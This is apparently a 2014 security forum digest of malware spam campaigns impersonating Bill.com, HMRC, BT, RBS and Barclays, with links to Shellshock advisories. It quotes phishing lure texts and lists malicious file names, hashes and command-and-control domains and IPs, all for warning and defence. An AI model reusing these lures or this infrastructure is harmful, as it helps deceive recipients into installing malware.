... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
   Payment Details [Incident: 711935-599632]
Typical e-mail details:
   We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

 RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/

 Evil or Very Mad Evil or Very Mad  Sad

 10 
 on: September 26, 2014, 02:29:01  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

- http://tools.cisco.com/security/center/publicationListing.x

GNU Bash Environmental Variable Command Injection Vuln
Advisory ID: cisco-sa-20140926-bash
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
2014 Sep 26 - "Summary: On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.
All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, exploitation of the vulnerability results in an authenticated attacker having the ability to execute commands for which they are not authorized. A number of Cisco products ship with or leverage an affected version of the Bash shell. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability...
(See "Affected Products" list at the URL above.)
Rev 1.4 - 2014-Sep-30 - Updated the Affected Products, Vulnerable Products, and Products Confirmed Not Vulnerable sections.

Advisory (ICSA-14-269-01)
Bash Command Injection Vulnerability
- https://ics-cert.us-cert.gov//advisories/ICSA-14-269-01
Sep 26, 2014

Also see: https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability
Last revised: Sep 30, 2014

- https://www.us-cert.gov/ncas/alerts/TA14-268A
Last revised: Sep 30, 2014

- http://www.kb.cert.org/vuls/id/252743
Last revised: 1 Oct 2014

Bash vuln -aka- Shellshock ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/
Sep 25, 2014
> http://about-threats.trendmicro.com/us/threat-intelligence/internet-of-everything/attack-scenarios/the-shellshock-vulnerability-bash-bug

FREE protection for Shellshock
- http://www.trendmicro.com/us/security/shellshock-bash-bug-exploit/index.html

- http://www.securitytracker.com/id/1030890
CVE Reference:
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
Updated: Oct 1 2014
Original Entry Date: Sep 24 2014
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Vendor Confirmed: Yes Exploit Included: Yes  
Version(s): 4.3 ...
... vulnerability is being actively exploited
Vendor URL: https://www.gnu.org/software/bash/
___

Semiannual Cisco IOS Software Security Advisory Bundled Publication
- http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html
Sep 24, 2014 - "... Use the Cisco IOS Software Checker* to quickly determine whether a given Cisco IOS Software release is exposed to Cisco product vulnerabilities..."
* http://tools.cisco.com/security/center/selectIOSVersion.x

 Exclamation Exclamation

Pages: [1] 2 3 ... 10
Powered by SMF 1.1.19 | SMF © 2013, Simple Machines Page created in 0.491 seconds with 16 queries.